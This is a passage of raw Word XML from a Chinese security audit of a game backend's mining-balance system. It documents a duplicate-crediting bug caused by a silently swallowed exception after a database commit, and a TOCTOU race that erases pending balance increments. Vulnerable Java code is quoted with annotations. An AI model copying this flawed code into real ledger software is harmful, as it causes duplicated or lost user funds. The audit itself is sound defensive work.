          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已入账），但第 3 步 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>afterFlush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pushBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 抛出异常（如 Redis 短暂不可用、WebSocket 推送失败等），异常被静默吞掉，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的缓存条目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有被清除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。3 秒后下一次调度触发时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balanceCache.getPending(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍会返回同一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 值，导致该笔金额被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>再次加入 DB 余额</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，形成重复入账。</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@Scheduled(fixedRate=3s)</w:t>
              <w:br/>
              <w:t>flushCacheToDb()</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ balanceCache.getPending(userId)          ← [1] 读取待入账金额（缓存未清）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ miningService.flushUserFromCache(...)    ← [2] DB 事务提交：余额已落库</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │       @Transactional</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │       findByUserIdForUpdate (PESSIMISTIC_WRITE)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │       account.setGoldBalance(cur + pending)</w:t>
              <w:br/>
              <w:t xml:space="preserve">  │       userAccountRepository.save(account) ← DB committed，不可逆</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ├─ balanceCache.afterFlush(userId, newBal)  ← [3] 清缓存（若此处抛异常→</w:t>
              <w:br/>
              <w:t xml:space="preserve">  └─ catch(Exception ignored) {}              ←     被静默吞掉，pending 未清除)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                                                     下一个 tick 再次 flush 同一笔</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存在漏洞的代码（含关键调用链片段）</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定时任务入口：MiningScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = FLUSH_INTERVAL_MS)</w:t>
              <w:br/>
              <w:t>public void flushCacheToDb() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Set&lt;Long&gt; userIds = balanceCache.getUsersWithPending();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userIds.isEmpty()) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (Long userId : userIds) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userId == null) continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal pending = balanceCache.getPending(userId);          // ← [1] 读 pending（此时 pending=X）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (pending == null || pending.compareTo(BigDecimal.ZERO) &lt;= 0) continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            BigDecimal newBalance = miningService.flushUserFromCache(userId, pending); // ← [2] DB 事务提交，余额+X，已不可回滚</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if (newBalance != null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                balanceCache.afterFlush(userId, newBalance);               // ← [3] 若此处抛异常（Redis 不可用等）</w:t>
              <w:br/>
              <w:t xml:space="preserve">                balancePushService.pushBalance(userId, newBalance, null);  // ← [3] 或此处抛异常</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch (Exception ignored) {}                                     // ← ⚠ 静默吞异常：pending 未清除，3s 后重复 flush</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 落库逻辑：MiningService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public BigDecimal flushUserFromCache(Long userId, BigDecimal pendingGold) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ... 校验省略</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserIdForUpdate(userId).orElse(null); // ← 悲观锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (account == null) return null;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal cur = account.getGoldBalance() != null ? account.getGoldBalance() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(cur.add(pendingGold));    // ← balance += pending（已提交后不可逆）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    user.setLastMiningAt(LocalDate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Time.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.save(user);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return account.getGoldBalance();                 // ← 返回新余额，DB 事务此时提交</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重复入账触发路径</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DB 余额</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缓存 pending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事件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调度触发，读到 pending=50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flushUserFromCache</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 事务提交，余额+50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50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（未清）</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afterFlush</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 抛异常，被 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>catch(ignored)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 吞掉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下次调度再次读 pending=50，再次 +50 入账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T=6s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持续重复，直到 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>afterFlush</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 成功</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1199"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每次缓存清除失败，该用户的金币余额将被额外增加一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 周期的挖矿量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若 Redis 出现持续性抖动（几十秒），可累积多次重复入账</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1201"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>金币若可兑换提现或参与交易，等价于用户凭空获得本不属于其的平台资产</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无任何告警/日志，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>catch (Exception ignored)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使异常完全静默，运营层面难以感知</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1203"/>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（定时任务后台自动执行，无需用户操作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>触发前置条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>afterFlush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pushBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 DB 事务提交后抛出异常（Redis 抖动、WebSocket 推送失败等），概率低但在生产环境客观存在</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205"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MiningScheduler.java.flushCacheToDb → MiningService.java.flushUserFromCache → UserAccountRepository.java.findByUserIdForUpdate</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audit_m263_1119_flushCacheToDb_ctrl-path6of13.md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：RedisMiningBalanceCache.java#afterFlush</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_57" w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞56：TOCTOU 竞态导致挖矿 Pending 余额静默丢失（资金损失）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="120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：调度任务读取 Pending 与 afterFlush 清零之间存在 TOCTOU 竞态，并发挖矿增量被无声截断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="120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src/main/java/com/gameBack/mjservice/common/helper/RedisMiningBalanceCache.java:afterFlush</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="120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并发设计缺陷（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="120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1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：无需外部触发，系统自发产生（调度任务与游戏挖矿并发写竞争）</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flushCacheToDb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调度任务（每 3 秒触发）在如下序列中存在明确的 TOCTOU 窗口：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1211"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T₁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getPending(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读取 Redis 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段快照值 P；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1212"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T₁~T₃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>miningService.flushUserFromCache(userId, P)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行数据库写入，此操作需要网络往返 + 磁盘 IO，时间窗口在数十毫秒量级；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1213"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T₂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（窗口内）：游戏层挖矿操作（mining accumulation）向同一用户的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段追加增量 ΔP，使 Redis 中实际值变为 P + ΔP；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1214"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T₃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>afterFlush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被调用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写死为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，即：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1215"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>已入库部分：P ✅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1216"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>窗口内新增部分：ΔP ❌（被抹除，未入库、未留痕）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键证据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>afterFlush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中不存在任何 Compare-And-Swap（CAS）、GETDEL、Lua 脚本原子操作或乐观锁机制来保护 Pending 字段，而是直接 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>put(key, "pending", "0")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，覆盖写入时并不校验当前值是否等于 flush 前读取的值 P。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统架构层面的佐证：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
